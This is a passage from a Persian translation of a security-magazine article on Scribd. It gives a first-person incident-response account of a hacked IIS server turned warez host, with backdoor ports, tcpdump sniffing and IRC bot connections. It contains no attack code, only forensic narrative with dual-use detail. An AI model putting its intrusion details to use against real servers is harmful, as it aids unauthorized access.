Scribd Logo
Upload

Welcome to Scribd!

  • ﺖﺸﻬﺒﻳﺩﺭﺍ ﻝﻭﺍ ١٣٨٣: Cyrus Peikari, Seth Fogie: ﺎﺑ ﻩﺪﺷ ﻲﺑﺎﻳ ﻪﺸﻳﺭ Tkbot.R00T.Edition.Final

    Uploaded by

    api-3777069
    14 views5 pages

    Original Title

    3

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    14 views5 pages

    ﺖﺸﻬﺒﻳﺩﺭﺍ ﻝﻭﺍ ١٣٨٣: Cyrus Peikari, Seth Fogie: ﺎﺑ ﻩﺪﺷ ﻲﺑﺎﻳ ﻪﺸﻳﺭ Tkbot.R00T.Edition.Final

    Uploaded by

    api-3777069

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 5

    ‫ﺭﻭ ﺩﺭ ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

    ‫ﺭﻭ ﺩﺭ ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬


    ‫» ﻗﺴﻤﺖ ﺳﻮﻡ «‬
    ‫ﻣﺘﺮﺟﻢ ‪ :‬ﺭﺿﺎ ﻣﺪﺩﻱ‬
    ‫ﺗﺎﺭﻳﺦ ‪ :‬ﺍﻭﻝ ﺍﺭﺩﻳﺒﻬﺸﺖ ‪١٣٨٣‬‬
    ‫ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ‪Cyrus Peikari, Seth Fogie :‬‬

    ‫ﻫﻤـﻪ ﭼـﻴﺰ ﺑـﺎ ﺗﻤﺎﺱ ﺳﺎﺩﻩ ﻳﻚ ﻣﺸﺘﺮﻱ ﻧﮕﺮﺍﻥ ﺷﺮﻭﻉ ﺷﺪ‪ .‬ﺩﻟﻬﺮﻩ ﻭ ﺷﻜﺎﻳﺖ ﻣﺸﺘﺮﻱ ﻣﻮﺭﺩ ﻧﻈﺮ ﺍﺯ‬
    ‫ﺍﻓـﺖ ﺳﺮﻋﺖ ﺍﺗﺼﺎﻝ ﺩﺳﺘﮕﺎﻩ ﺍﻭ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻮﺩ‪ .‬ﺑﺮ ﺍﺳﺎﺱ ﺍﻳﻦ ﻣﻄﻠﺐ ﺳﺎﺩﻩ ﺑﻮﺩ ﻛﻪ ﻣﻦ ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﺘﻮﺟﻪ‬
    ‫ﺷـﺪﻡ ﻛﻪ ﺳﺮﻭﺭ ﺍﺻﻠﻲ ﺍﺗﺼﺎﻝ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻜﺮﺭﺍ ﻗﺮﺑﺎﻧﻲ ﻭﻳﺮﻭﺱﻫﺎ ﻭ ﻫﻜﺮﻫﺎ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﻫﻜﺮﻫﺎ ﺑﺎ‬
    ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺁﺳﻴﺐﭘﺬﻳﺮ‪ ،‬ﺗﻮﺍﻧﺴﺘﻪ ﺑﻮﺩﻧﺪ ﺑﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﮔﺮﻓﺘﻦ ‪ ،IIS‬ﻛﺎﻣﭙﻴﻮﺗﺮ ﻣﺸﺘﺮﻱ ﺭﺍ ﺩﺭ‬
    ‫ﺍﺧﺘـﻴﺎﺭ ﮔﺮﻓﺘﻪ ﻭ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺁﻥ ﺭﺍ ﺑﻪ ﻳﻚ ﺳﺮﻭﺭ ‪ warez‬ﻛﻪ ﻣﻴﺰﺑﺎﻥ ﺑﻴﺶ ﺍﺯ ‪ ٣‬ﮔﻴﮕﺎﺑﺎﻳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ‬
    ‫ﻏﻴﺮﻣﺠﺎﺯ ﺍﺳﺖ ﺗﺒﺪﻳﻞ ﻛﻨﻨﺪ‪.‬‬
    ‫ﺩﺭ ﻧﺘـﻴﺠﻪ ﺁﻧﭽـﻪ ﺩﺭ ﺑﺎﻻ ﮔﻔﺘﻪ ﺷﺪ‪ ،‬ﺑﻪ ﻣﺸﺘﺮﻱ ﻣﺰﺑﻮﺭ ﮔﻔﺘﻢ ﻛﻪ ﺩﺭ ﺣﺎﻝ ﺣﺎﺿﺮ ﺑﺎﻳﺪ ﺑﺎ ﻧﺼﺐ ﺗﻤﺎﻡ‬
    ‫‪ Service Pack‬ﻫـﺎﻱ ﺿﺮﻭﺭﻱ‪ ،‬ﻓﻮﺭﺍ ﺳﺮﻭﺭ ﺭﺍ ﺗﻤﻴﺰ ﻛﺮﺩﻩ ﻭ ﺩﻭﺑﺎﺭﻩ ﺁﻥ ﺭﺍ ﺍﺯ ﺍﺑﺘﺪﺍ ﺍﺟﺮﺍ ﻛﻨﺪ‪ .‬ﺑﻌﺪ ﺍﺯ ﺑﺤﺚ‬
    ‫ﻛـﺮﺩﻥ ﺑـﺮ ﺳـﺮ ﺗﻤﻬـﻴﺪﺍﺕ ﻣﺤﺎﻓﻈﺘـﻲ ﻣﻤﻜـﻦ ﺑـﺎ ﻣﺸﺘﺮﻱ‪ ،‬ﺳﺮﻳﻌﺎ ﺑﻪ ﻛﻨﺪ ﻭ ﻛﺎﻭ ﺭﺍﻩ ﺩﻭﺭ ﻓﺎﻳﻠﻬﺎﻱ ﺳﺮﻭﺭ ﻭ‬
    ‫ﺟﻤـﻊﺁﻭﺭﻱ ﺩﺭ ﺣـﺪ ﻣﻘـﺪﻭﺭ ﺍﻃﻼﻋـﺎﺕ ﻣﻤﻜـﻦ ﺍﺯ ﻣﺘﺪﻫﺎ ﻭ ﺣﻘﻪﻫﺎﻳﻲ ﻛﻪ ﻫﻜﺮﻫﺎ ﺑﺮﺍﻱ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ‬
    ‫ﺳـﺮﻭﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﺑﻮﺩﻧﺪ‪ ،‬ﻧﻤﻮﺩﻡ‪ .‬ﺑﻪ ﻫﺮ ﺣﺎﻝ‪ ،‬ﭘﺲ ﺍﺯ ﺣﺪﻭﺩﺍ ﺩﻭ ﺳﺎﻋﺖ ﻛﻨﺪ ﻭ ﻛﺎﻭ‪ ،‬ﺑﻪ ﺳﺮﻋﺖ ﻣﺘﻮﺟﻪ‬
    ‫ﺍﻳـﻦ ﻣﻄﻠـﺐ ﺷـﺪﻡ ﻛﻪ ﻫﻢ ﺳﺮﻭﺭ ﻭﺏ ﻭ ﻫﻢ ﺑﺮﻧﺎﻣﻪ ﺭﺧﻨﻪ ﭘﺸﺘﻲ ﻣﻦ )‪ ، (Back Door‬ﻫﺮ ﺩﻭ ﺩﻳﮕﺮ ﭘﺎﺳﺨﻲ‬
    ‫ﻧﻤﻲﺩﻫﻨﺪ ﻭ ﻓﻌﺎﻟﻴﺘﻲ ﻧﺪﺍﺭﻧﺪ‪.‬‬
    ‫ﺍﻳـﻨﺠﺎ ﺟﺎﻳـﻲ ﺍﺳـﺖ ﻛـﻪ ﺍﺯ ﺍﻳـﻦ ﻗﻀﻴﻪ ﻭﺍﻗﻌﻲ ﺑﺮﺩﺍﺷﺖ ﻣﻲﻛﻨﻴﻢ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺪﻭﻥ ﻫﻴﭽﮕﻮﻧﻪ ﺣﺮﻑ‬
    ‫ﺍﺿﺎﻓﻪﺍﻱ ﺍﺟﺎﺯﻩ ﺩﻫﻴﺪ ﺗﺎ ﺩﺍﺳﺘﺎﻥ ﺭﺍ ﺍﺩﺍﻣﻪ ﺩﻫﻴﻢ‪.‬‬

    ‫ﺭﻳﺸﻪﻳﺎﺑﻲ ﺷﺪﻩ ﺑﺎ ‪Tkbot.R00t.EDITiON.FiNAL‬‬


    ‫ﺩﺭ ﺁﻧﺠـﺎ ﺑﻮﺩﻳـﻢ ﻛـﻪ ﻣـﻦ ﺑﺪﻭﻥ ﻫﻴﭻ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﺳﺮﻭﺭ ﻣﺎﻧﺪﻩ ﺑﻮﺩﻡ‪ .‬ﺍﻭﻟﻴﻦ‬
    ‫ﺣﺪﺳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺯﺩﻡ ﺁﻥ ﺑﻮﺩ ﻛﻪ ﺳﺮﻭﺭ ﺗﻮﺳﻂ ﻣﺪﻳﺮ ﺳﺮﻭﺭ ﻏﻴﺮﻓﻌﺎﻝ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺎ ﺍﻧﺠﺎﻡ‬
    ‫ﻳـﻚ ‪ Ping‬ﻭ ﺍﺳـﻜﻦ ﻛـﺮﺩﻥ ﭘـﻮﺭﺕﻫﺎ ﺑﻪ ﺳﺮﻋﺖ ﻣﺘﻮﺟﻪ ﺷﺪﻡ ﻛﻪ ﺳﺮﻭﺭ ‪ Offline‬ﻧﺒﻮﺩﻩ ﻭ ﺩﺍﺭﺍﻱ ﻓﻌﺎﻟﻴﺖ‬
    ‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺎ ﺑﺮﻗﺮﺍﺭﻱ ﻳﻚ ﺗﻤﺎﺳﻲ ﺗﻠﻔﻨﻲ ﺑﺎ ﻣﺪﻳﺮ‪ ،‬ﻣﺘﻮﺟﻪ ﺷﺪﻡ ﻛﻪ ﺍﻭ ﻫﻨﻮﺯ ﻫﻴﭻ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﻧﺪﺍﺩﻩ ﺍﺳﺖ‪.‬‬

    ‫‪1‬‬ ‫‪www.WebSecurityMgz.com‬‬
    ‫ﺭﻭ ﺩﺭ ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

    ‫ﺑﻄﻮﺭ ﺟﺎﻟﺒﻲ ﻋﻤﻞ ﺍﺳﻜﻦ ﭘﻮﺭﺕﻫﺎ‪ ،‬ﻫﻤﺎﻥ ﺷﻤﺎﺭﻩ ﭘﻮﺭﺕﻫﺎﻱ ﺑﺎﺯ ﻗﺒﻠﻲ ﺭﺍ ﺑﻪ ﺍﺿﺎﻓﻪ ﺩﻭ ﭘﻮﺭﺕ ‪1297‬‬
    ‫ﻭ ‪ 65130‬ﻭ ﺑﺎ ﻛﺎﻫﺶ ﺩﻭ ﭘﻮﺭﺕ ‪) 80‬ﺳﺮﻭﺭ ﻭﺏ( ﻭ ‪ 99‬ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ‪ ncx99.exe‬ﺍﺳﺖ‪ ،‬ﺑﺎﺯﻣﻲﮔﺮﺩﺍﻧﺪ‪.‬‬
    ‫ﺑـﺎ ﺩﺭ ﻧﻈﺮ ﮔﺮﻓﺘﻦ ﺍﻳﻨﻜﻪ ﻫﻴﭻ ﺭﺍﻩ ﺩﻳﮕﺮﻱ ﻧﺪﺍﺷﺘﻢ‪ ،‬ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻢ ﺗﺎ ﺍﺯ ﻃﺮﻳﻖ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪Telnet‬‬
    ‫ﻭ ‪ FTP‬ﺑـﻪ ﺍﻳـﻦ ﺩﻭ ﭘـﻮﺭﺕ ﺟﺪﻳﺪ ﻣﺘﺼﻞ ﺷﻮﻡ ﺗﺎ ﺑﺒﻴﻨﻢ ﺁﻧﻬﺎ ﭼﻪ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺑﺮﻣﻲﮔﺮﺩﺍﻧﻨﺪ‪ .‬ﺑﺎ ﺷﮕﻔﺘﻲ ﺑﻪ‬
    ‫ﻧﻈﺮ ﻣﻲﺭﺳﻴﺪ ﻛﻪ ﺳﺮﻭﺭ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﺎﺯﻫﻢ ﻗﺮﺑﺎﻧﻲ ﻫﻜﺮ ﺩﻳﮕﺮﻱ ﺷﺪﻩ ﺍﺳﺖ )ﻫﻤﺎﻧﻄﻮﺭﻱ ﻛﻪ ﺩﺭ ﺷﻜﻞ ﺷﻤﺎﺭﻩ‬
    ‫‪ ١‬ﻣـﻲﺑﻴﻨـﻴﺪ(‪ .‬ﺑـﺎ ﺍﻳـﻦ ﺣـﺎﻝ ﺩﺭ ﺍﻳـﻦ ﻣﻮﺭﺩ‪ ،‬ﻫﻜﺮ ﺑﻪ ﭘﺎﻙ ﻛﺮﺩﻥ ﺭﻭﺵﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻫﻜﺮﻫﺎﻱ ﺩﻳﮕﺮ ﺑﺮﺍﻱ‬
    ‫ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﺮﻭﺭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﻮﺩ‪ ،‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺍﺳﺖ‪.‬‬

    ‫ﺷﻜﻞ ‪١‬‬
    ‫ﺍﺗﺼﺎﻝ ‪ TelNet‬ﺑﻪ ﭘﻮﺭﺕ ‪ 65130‬ﺩﺭ ﺳﺮﻭﺭ ﻫﻚ ﺷﺪﻩ‬

    ‫ﺑﻌـﺪ ﺍﺯ ﭼﻨﺪﻳـﻦ ﻣـﻮﺭﺩ ﺗـﻼﺵ ﺑـﺮﺍﻱ ﺣـﺪﺱ ﺯﺩﻥ ﻛﻠﻤﺎﺕ ﻋﺒﻮﺭ ﮔﻮﻧﺎﮔﻮﻥ ﻣﺘﺪﺍﻭﻝ‪ ،‬ﺩﻭﺑﺎﺭﻩ ﺑﺎ ﻣﺪﻳﺮ‬
    ‫ﺳـﺮﻭﺭ ﺗﻤـﺎﺱ ﮔﺮﻓـﺘﻢ ﺗـﺎ ﺩﺭﺑﺎﺭﻩ ﺁﺧﺮﻳﻦ ﺍﺗﻔﺎﻗﺎﺕ ﺍﺯ ﻃﺮﻳﻖ ﻭﻱ ﺑﺎﺧﺒﺮ ﺷﻮﻡ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺩﺭ ﺍﻳﻦ ﺗﻤﺎﺱ ﺍﺯ ﺍﻭ‬
    ‫ﺑﺮﺍﻱ ﻛﻨﺪ ﻭ ﻛﺎﻭ ﺳﺮﻭﺭ ﺩﺭ ﺳﺎﻳﺘﻲ ﻛﻪ ﺩﺳﺘﮕﺎﻩ ﺩﺭ ﺁﻧﺠﺎ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﻮﺩ ﺍﺟﺎﺯﻩ ﺧﻮﺍﺳﺘﻢ ﻭ ﺩﺭﺧﻮﺍﺳﺖ ﻛﺮﺩﻡ‬

    ‫‪2‬‬ ‫‪www.WebSecurityMgz.com‬‬
    ‫ﺭﻭ ﺩﺭ ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

    ‫ﺗـﺎ ﺍﻃﻼﻋﺎﺗـﻲ ﺍﺯ ﺷﻨﺎﺳـﻪ ﻋـﺒﻮﺭ )‪ (Account‬ﻣﺪﻳـﺮ ﺭﺍ ﻛـﻪ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺳﺮﻭﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ ﺩﺭ‬
    ‫ﺍﺧﺘﻴﺎﺭﻡ ﻗﺮﺍﺭ ﺩﻫﺪ‪.‬‬

    ‫ﺷﺮﻭﻉ ﺑﺎﺯﻱ‪ :‬ﺭﻭﺯ ﺩﻭﻡ‪ ،‬ﺑﻌﺪﺍﺯﻇﻬﺮ‬


    ‫ﺗـﺎ ﺑﻌﺪﺍﺯﻇﻬـﺮﻱ ﻛـﻪ ﺩﺭ ﭘـﻴﺶ ﺍﺳـﺖ ﻧﻤـﻲﺗﻮﺍﻧﻢ ﺑﻪ ﺳﺎﻳﺖ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻢ‪ .‬ﺑﺎ ﺍﻳﻦ ﺣﺎﻝ ﺍﺯ‬
    ‫ﺯﻣﺎﻧـﻲ ﻛـﻪ ﺗـﺎ ﺁﻥ ﻣﻮﻗﻊ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻡ ﺑﺮﺍﻱ ﻃﺮﺍﺣﻲ ﻳﻚ ﺭﻭﺵ ﺍﺣﺘﻤﺎﻟﻲ ﺟﻬﺖ ﺭﺳﻴﺪﻥ ﺑﻪ ﻫﺪﻓﻢ ﺍﺳﺘﻔﺎﺩﻩ‬
    ‫ﻣﻲﻛﻨﻢ‪ .‬ﭘﺲ ﺍﺯ ﺗﻔﻜﺮ ﺩﺭﺑﺎﺭﻩ ﺍﻧﺘﺨﺎﺏﻫﺎﻱ ﻣﻮﺟﻮﺩ‪ ،‬ﺑﺮﺍﻳﻢ ﻣﺸﺨﺺ ﺷﺪ ﻛﻪ ﺑﻬﺘﺮﻳﻦ ﺭﺍﻩ ﺭﺳﻴﺪﻥ ﺑﻪ ﺭﻭﺷﻲ ﻛﻪ‬
    ‫ﻫﻜـﺮ ﺍﺯ ﻃـﺮﻳﻖ ﺁﻥ ﺗﻮﺍﻧﺴﺘﻪ ﺑﺮﻧﺎﻣﻪ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﻧﺼﺐ ﻛﻨﺪ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺑﺘﻮﺍﻧﻢ ﻳﻜﻲ ﺍﺯ ﻛﻠﻤﺎﺕ‬
    ‫ﻋـﺒﻮﺭ ‪ Telnet‬ﻳـﺎ ‪ Ftp‬ﺍﺳـﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺗﻮﺳﻂ ﻫﻜﺮ ﺑﻪ ﻫﻨﮕﺎﻡ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻡ‪ .‬ﻫﻤﭽﻨﻴﻦ‬
    ‫ﺑـﺮﻧﺎﻣﻪﺭﻳـﺰﻱ ﻛـﺮﺩﻡ ﺗـﺎ ﻧﮕﺎﻫـﻲ ﺩﻗـﻴﻖ ﺑﻪ ‪ Log‬ﻓﺎﻳﻞﻫﺎ ﻭ ﻓﺎﻳﻞ ﺳﻴﺴﺘﻤﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻢ ﺗﺎ ﺑﺒﻴﻨﻢ ﻣﻲﺗﻮﺍﻥ‬
    ‫ﺗﻐﻴﻴﺮﺍﺗـﻲ ﻣـﺮﺑﻮﻁ ﺑـﻪ ﺍﻳﻦ ﻣﺨﻤﺼﻪ ﺭﺍ ﺩﺭ ‪ ٢٤‬ﺳﺎﻋﺖ ﮔﺬﺷﺘﻪ ﺁﻧﻬﺎ ﭘﻴﺪﺍ ﻛﺮﺩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺑﺎ ﺁﻧﻜﻪ ﺍﻳﻦ ﮔﺎﺭ ﻣﺎﻧﻨﺪ‬
    ‫ﺍﻧﺪﺍﺧﺘـﻦ ﺗﻴﺮﻱ ﺩﺭ ﺗﺎﺭﻳﻜﻲ ﺑﻮﺩ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻧﻬﺎﻳﺖ ﺑﻪ ﺑﻬﺘﺮﻳﻦ ﻭﺟﻪ ﻭ ﺑﻄﻮﺭ ﺟﺎﻟﺒﻲ ﭘﺎﺳﺨﻲ ﺑﻪ ﻣﻦ ﺩﺍﺩ ﻛﻪ ﺍﺻﻼ‬
    ‫ﺑﻪ ﺩﻧﺒﺎﻝ ﺁﻥ ﻧﺒﻮﺩﻡ‪.‬‬

    ‫ﻫﻨﮕﺎﻣـﻲ ﻛﻪ ﺑﻪ ﺳﺎﻳﺖ ﺭﺳﻴﺪﻡ‪ ،‬ﻓﻮﺭﺍ ﻛﺎﺭﮔﺎﻩ ﺭﺍ ﺑﺮﭘﺎ ﻛﺮﺩﻡ‪ .‬ﺍﺯ ﺁﻧﺠﺎﻳﻲ ﻛﻪ ﺳﺎﻳﺖ ﺩﺭ ﻋﻮﺽ ﺍﺳﺘﻔﺎﺩﻩ‬
    ‫ﺍﺯ ﺷﺒﻜﻪ ﺳﻮﺋﻴﭽﻲ‪ ،‬ﺍﺯ ﺷﺒﻜﻪ ﻣﺒﺘﻨﻲ ﺑﺮ ﻫﺎﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩ ﺑﺮﺍﺣﺘﻲ ﻗﺎﺩﺭ ﺑﻪ ﺍﺗﺼﺎﻝ ﻛﺎﻣﭙﻴﻮﺗﺮ ﻫﻤﺮﺍﻫﻢ ﺑﻪ‬
    ‫ﺷﺒﻜﻪ ﺑﻮﺩﻩ ﻭ ﺍﺯ ﺁﻥ ﻃﺮﻳﻖ ﻣﻲﺗﻮﺍﻧﺴﺘﻢ ﺩﺯﺩﻱ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﻪ ﺭﺍ ﺁﻏﺎﺯ ﻛﻨﻢ‪.‬‬

    ‫ﻫـﺎﺏﻫﺎ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺑﻪ ﺳﻮﻱ ﻫﻤﻪ ﭘﻮﺭﺕﻫﺎ ﻣﻨﺘﺸﺮ ﻛﺮﺩﻩ ﻭ ﺑﻪ ﻫﻤﻪ ﺍﺑﺰﺍﺭﻫﺎ ﺍﻳﻦ ﺍﺟﺎﺯﻩ ﺭﺍ ﻣﻲﺩﻫﻨﺪ ﺗﺎ‬
    ‫ﺧـﻮﺩ ﺗﺸـﺨﻴﺺ ﺩﻫـﻨﺪ ﻛـﻪ ﻛﺪﺍﻣﻴﻚ ﺍﺯ ﺑﺴﺘﻪﻫﺎ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﺍﺭﺳﺎﻝ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ‪ ،‬ﺳﻮﺋﻴﭻﻫﺎ ﺑﺮ‬
    ‫ﺁﺩﺭﺱ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻫﺮ ﺍﺑﺰﺍﺭ ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﻧﻈﺎﺭﺕ ﻛﺮﺩﻩ ﻭ ﻓﻘﻂ ﺩﺭ ﺻﻮﺭﺗﻲ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍ ﺑﻪ ﭘﻮﺭﺗﻲ‬
    ‫ﻣﻲﻓﺮﺳﺘﻨﺪ ﻛﻪ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﺑﻪ ﺁﻥ ﭘﻮﺭﺕ ﺑﺮﻭﺩ‪ .‬ﺍﻳﻦ ﺍﻣﺮ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺑﺮ ﺭﻭﻱ ﻳﻚ ﺷﺒﻜﻪ ﺳﻮﺋﻴﭽﻲ‬
    ‫ﺭﺍ ﺑﺎ ﻛﻤﻲ ﻣﺸﻜﻞ ﻭ ﭼﺎﻟﺶ ﻣﻮﺍﺟﻪ ﻣﻲﺳﺎﺯﺩ‪.‬‬

    ‫ﻫـﺪﻑ ﻣـﻦ ﺍﻳـﻦ ﺑﻮﺩ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻛﻨﻢ ﻭ ﺳﭙﺲ ﺩﺭ ﻣﻮﻋﺪ ﻣﻨﺎﺳﺐ ﺁﻧﻬﺎ ﺭﺍ ﺁﻧﺎﻟﻴﺰ ﻛﻨﻢ‪.‬‬
    ‫ﺑـﺮﺍﻱ ﺗﺴـﻬﻴﻞ ﺍﻳﻦ ﻛﺎﺭ‪ Tcpdump ،‬ﺭﺍ ﺑﺮ ﺭﻭﻱ ﻛﺎﻣﭙﻴﻮﺗﺮﻡ ﻛﻪ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ‪ Linux‬ﺑﺮ ﺭﻭﻱ ﺁﻥ ﺩﺭ ﺣﺎﻝ‬
    ‫ﺍﺟﺮﺍ ﺑﻮﺩ‪ ،‬ﺍﺟﺮﺍ ﻛﺮﺩﻩ ﻭ ﺁﻥ ﺭﺍ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﺍﻃﻼﻋﺎﺕ ﺑﺪﺳﺖ ﺁﻣﺪﻩ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﺑﺮ ﺭﻭﻱ ﻫﺎﺭﺩ ﺗﻈﻴﻢ ﻛﺮﺩﻡ‪ .‬ﺑﺎ‬
    ‫ﺍﻧﺠـﺎﻡ ﺍﻳﻦ ﻛﺎﺭ‪ ،‬ﺷﺮﻭﻉ ﺑﻪ ﺟﺴﺘﺠﻮ ﺩﺭ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ‪ ،‬ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ ﻭ ﺳﺮﻭﻳﺲﻫﺎﻱ ﺩﺭ ﺣﺎﻝ ﺍﺟﺮﺍ ﻭ ﺍﺟﺮﺍ‬
    ‫ﺷﺪﻩ ﺳﺮﻭﺭ ﻧﻤﻮﺩﻡ‪.‬‬

    ‫‪3‬‬ ‫‪www.WebSecurityMgz.com‬‬
    ‫ﺭﻭ ﺩﺭ ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

    ‫ﻣـﻦ ﺑـﺎ ‪ NetStat‬ﻛـﻪ ﺍﻃﻼﻋﺎﺗـﻲ ﺭﺍﺟـﻊ ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮ ﺧﻮﺩ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ‪ ،‬ﺷﺮﻭﻉ‬
    ‫ﻛـﺮﺩﻡ‪ .‬ﻫﻤـﺎﻥﻃـﻮﺭ ﻛـﻪ ﺩﺭ ﺷـﻜﻞ ﺷـﻤﺎﺭﻩ ‪ ٢‬ﻣـﻲﺑﻴﻨﻴﺪ‪ ،‬ﭼﻨﺪﻳﻦ ﺍﺗﺼﺎﻝ ﻣﺸﻜﻮﻙ ﺑﺴﻴﺎﺭ ﻭﺍﺿﺢ ﺑﻮﺩﻧﺪ )ﺑﻪ‬
    ‫ﺍﺭﺗـﺒﺎﻃﺎﺕ ﺑـﺎ ﺳـﺮﻭﺭﻫﺎﻱ ‪ IRC‬ﺗﻮﺟـﻪ ﻛﻨـﻴﺪ‪ ، (.‬ﺳﭙﺲ ﺑﻪ ﻓﻬﺮﺳﺖ ‪ Task‬ﻛﻪ ﻟﻴﺴﺖ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺩﺭ ﺣﺎﻝ‬
    ‫ﺍﺟﺮﺍﻱ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻧﮕﺎﻫﻲ ﺍﻧﺪﺍﺧﺘﻢ‪ .‬ﻣﺘﻮﺟﻪ ﻳﻚ ﺳﺮﻭﻳﺲ ﻏﻴﺮ ﻣﻌﻤﻮﻝ ﺑﺎ ﻧﺎﻡ ‪FireDaemon‬‬
    ‫ﺷـﺪﻡ‪ .‬ﺑﻌـﺪ ﺍﺯ ﺍﻧﺠـﺎﻡ ﺟﺴـﺘﺠﻮﻳﻲ ﻛـﻪ ﺩﺭ ﻫﻤـﺎﻥ ﻣﻮﻗـﻊ ﺑﻪ ﺻﻮﺭﺕ ‪ Online‬ﺍﻧﺠﺎﻡ ﺩﺍﺩﻡ ﻣﺘﻮﺟﻪ ﺷﺪﻡ ﻛﻪ‬
    ‫‪ FireDaemon‬ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻤﻜﻲ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﻫﺮ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﺍﺳﻜﺮﻳﭙﺖ )ﻣﺎﻧﻨﺪ‬
    ‫‪ (Python ، Java ، Perl ، BAT/CMD‬ﺫﺍﺗـﺎ ﻣـﺮﺑﻮﻁ ﺑﻪ ‪ Win32‬ﺭﺍ ﺑﻄﻮﺭ ﻣﺠﺎﺯﻱ ﻣﺎﻧﻨﺪ ﻳﻚ ﺳﺮﻭﻳﺲ‬
